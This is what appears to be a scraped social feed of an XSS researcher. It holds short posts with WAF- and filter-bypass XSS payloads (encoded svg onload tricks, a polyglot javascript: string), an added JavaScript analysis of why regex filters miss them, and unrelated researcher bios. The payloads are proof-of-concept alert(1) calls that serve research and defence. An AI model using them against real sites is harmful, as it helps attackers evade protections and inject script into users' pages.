This might trick some #XSS filters out there, including CloudFlare's.
<Svg OnLoad="alert//>%0A(1)"
07.05.2025 15:47
If you learn a #hacking technique but can't make it work, it's because you understand the example, not the technique.
21.11.2024 23:22
Nice work in the original payload below.
Although "style=" (and "<link") are easily caught by most cloud WAFs I've seen out there, I've just made it shorter and "bypass friendly".
<p><dd onscrollsnapchange=alert(1)>
<link href=//X55.is/k rel=stylesheet>
PoC: brutelogic.com.br/xss.php?a=%3...
21.11.2024 19:45
brutelogic.com.br/blog/buildin...
21.11.2024 11:37
Some neat #XSS tricks to #Bypass #WAF in URL Context
=> HTMLi + Double Encoding + Embedded bytes
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
=> + Octal Encoding
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
Lab: brutelogic.com.br/dom/sinks.ht...
19.11.2024 15:35
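Added example, not Brute Logic's code: the three payloads in the posts above (the `alert//>%0A(1)` attribute trick and the two URL-context tricks) only become `alert(1)` after the browser has applied several decoding steps that a regex filter on the raw request never performs. The script models those steps and compares what a naive signature set sees in the raw parameter with what actually runs. Everything below is an assumption for illustration: the sink URL-decodes the parameter once; a `"url"` sink then navigates to the value (the URL parser strips ASCII tab/newline, a `javascript:` body is percent-decoded, and a string result is rendered as the new document); an `"html"` sink writes the decoded value straight into markup. `markupSeenByBrowser`, `analyze`, the `RULES` set and the payload list are names and data constructed for this example.

```javascript
// Added example (not the original poster's code). Models browser decoding of
// the payloads above and contrasts it with a naive regex filter on the raw input.

// JavaScript string-literal escapes relevant here: legacy octal (\74 = '<'),
// \xHH, \uHHHH and single-character escapes.
function decodeJsString(s) {
  return s.replace(/\\(?:([0-7]{1,3})|x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|(.))/g,
    (_, oct, hex, uni, ch) => {
      if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
      if (hex !== undefined) return String.fromCharCode(parseInt(hex, 16));
      if (uni !== undefined) return String.fromCharCode(parseInt(uni, 16));
      return { n: "\n", r: "\r", t: "\t" }[ch] ?? ch;
    });
}

// HTML character references inside an attribute value; &lpar; and &rpar; are
// the named forms of '(' and ')' that the payloads rely on.
const NAMED = { lpar: "(", rpar: ")", lt: "<", gt: ">", amp: "&", quot: '"' };
function decodeEntities(v) {
  return v.replace(/&(?:#x([0-9a-fA-F]+)|#(\d+)|(\w+));/g, (m, hex, dec, name) =>
    hex ? String.fromCodePoint(parseInt(hex, 16))
      : dec ? String.fromCodePoint(parseInt(dec, 10))
      : (NAMED[name] ?? m));
}

// Assumed sink behaviour: decode once, then either reflect into HTML or
// navigate to the value as a URL.
function markupSeenByBrowser(raw, sink) {
  const once = decodeURIComponent(raw);          // %25 -> '%', %0A -> '\n'
  if (sink === "html") return once;              // reflected straight into HTML
  const url = once.replace(/[\t\n\r]/g, "");     // URL parser drops these bytes
  const m = /^javascript:(.*)$/i.exec(url);
  if (!m) return null;                           // not a javascript: URL
  const body = decodeURIComponent(m[1]);         // %26 -> '&'
  const lit = /^"((?:[^"\\]|\\.)*)"$/.exec(body.trim());
  if (!lit) throw new Error("demo only handles a string-literal javascript: URL");
  return decodeJsString(lit[1]);                 // the string becomes the document
}

// Minimal start-tag tokenizer. Like the HTML tokenizer it reads a quoted
// attribute value up to the matching quote, so a '>' inside quotes does not
// end the tag.
function parseStartTag(html) {
  const open = /<([A-Za-z][^\s\/>]*)/.exec(html);
  if (!open) return null;
  const attrs = {};
  const attr = /[\s\/]*([^\s\/>=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/y;
  attr.lastIndex = open.index + open[0].length;
  let m;
  while ((m = attr.exec(html)) !== null) {
    attrs[m[1].toLowerCase()] = decodeEntities(m[2] ?? m[3] ?? m[4] ?? "");
  }
  return { name: open[1].toLowerCase(), attrs };
}

// The handler body is JavaScript: a '//' comment ends at the newline, so
// "alert//>\n(1)" is really the call alert(1). Whitespace is collapsed only
// to make the comparison readable.
function effectiveHandler(js) {
  return js.replace(/\/\/[^\n]*/g, "").replace(/\s+/g, "");
}

// Naive signature set (constructed). naiveTagView() mimics a filter that
// assumes the tag ends at the first '>' it meets.
const RULES = [/<svg/i, /on\w+\s*=/i, /alert\s*\(/i];
const hits = (s) => RULES.filter((r) => r.test(s)).map((r) => r.source);
const naiveTagView = (s) => s.slice(0, s.indexOf(">") + 1);

function analyze(raw, sink) {
  const html = markupSeenByBrowser(raw, sink);
  if (!html) throw new Error("value did not resolve to markup");
  const tag = parseStartTag(html);
  const handler = effectiveHandler(tag.attrs.onload ?? "");
  return {
    tag: tag.name,
    handler,
    rawHits: hits(sink === "html" ? naiveTagView(raw) : raw),
    realHits: hits(`<${tag.name} onload=${handler}`),
  };
}

// The three payloads from the posts above, as they would travel in a URL.
const PAYLOADS = [
  ['<Svg OnLoad="alert//>%0A(1)"', "html"],
  ['JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"', "url"],
  ['JavaScript:"\\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"', "url"],
];
for (const [raw, sink] of PAYLOADS) console.log(sink, analyze(raw, sink));
```

For every payload the handler the browser ends up with is `alert(1)` on an `svg` tag, which trips all three rules; on the raw request the `alert(` signature never fires, and for the octal-encoded variant none of the three rules fire at all. The practical check this suggests for a filter is to normalise the way the consuming parser does (percent-decode, drop tab/newline for URL sinks, decode entities and JS escapes, tokenize attributes properly) before matching, rather than matching the raw bytes.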
I'm so happy to see all my old twitter friends and no nefarious billionaires!!
18.11.2024 01:00
Thank you, appreciate it.
18.11.2024 09:44
<XSS OnBlueSky=import(X)>
17.11.2024 23:37
#PenTesting?
Script your Password Spray.
29.08.2024 22:06
Interested in web security, bug bounties, machine learning and investing. SolidGoldMagikarp
javascript:/*--></title></style></textarea></script></xmp><svg/onload='-/"/-/onmouseover=1/-/[*/[]/-alert(1)//'>
https://garethheyes.co.uk/#latestBook
CWE, CVE, comedeh, susheh, etc. #vulnLife Not SushiDude on here as far as I recall.
Offensive Security Professional | Phillip Wylie Show Podcast Host | The Pentester Blueprint coauthor | TribeOfHackers Red Team | https://linktr.ee/phillipwylie
CEO, CISO, Trainer, Hacker, and Speaker.
AI + hacking + sec leadership.
ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.
Aspiring Bug Bounty Hunter & dev of tools: GAP, xnLinkFinder & waymore, featured in "Bug Hunter's Methodology: Application Analysis v1" by JHaddix
RTFM
founder @bugcrowd && co-founder @disclose_io || hacker, entrepreneur, executive, advisor || ΨΉΨ΅Ψ§ Ω ΩΨ³Ω || #w00w00
Security researcher/programmer – Managing director @ HexArcana – @DragonSectorCTF founder – he/him
#infosec | #exploiter | #asm | fox | #LFC | scanner of the internet | #wordpress exploiter | #greynoise lover. | #Bugbounty hunter | Northerner | #UK
Best-selling author of Alice and Bob Learn Secure Coding & Alice and Bob Learn Application Security. Secure Code Trainer - Nerd @Semgrep #AppSec she/her
https://shehackspurple.ca 💻
Builder, infosec, SCA and SAST enthusiast, blue team.
Founder of OWASP dependency-check.
https://github.com/sponsors/jeremylong
Birb stalker. Cat tree. Cyber Threat Researcher. Recovering cyber and natsec journalist. Navy vet. Meme war survivor. Creator of CyberThreaterator and Sean's Vuln Emotes (SVE) #Baltimore
@thepacketrat everywhere since 1994. https://falling-anvil.com
Full time bug bounty hunter. Look for βjoaxcarβ on other platforms
In your web, securing your app. Hacker, webdev, speaker, engineer. Security shoptet.cz, ex-report-uri.com, ex-teenager. HTTPS = How To Transfer Private Sh💩. Also https://infosec.exchange/@spazef0rze
Principal Application Security Engineer focused on all things #AppSec. Occasionally dabble in my own research. Also keen gamer and aspiring photographer.
💼: Staff Information Security Engineer at Google. 🛠️: Rosetta Flash, BitIodine. Web security, ₿, finance. Data is the most dangerous form of opinion.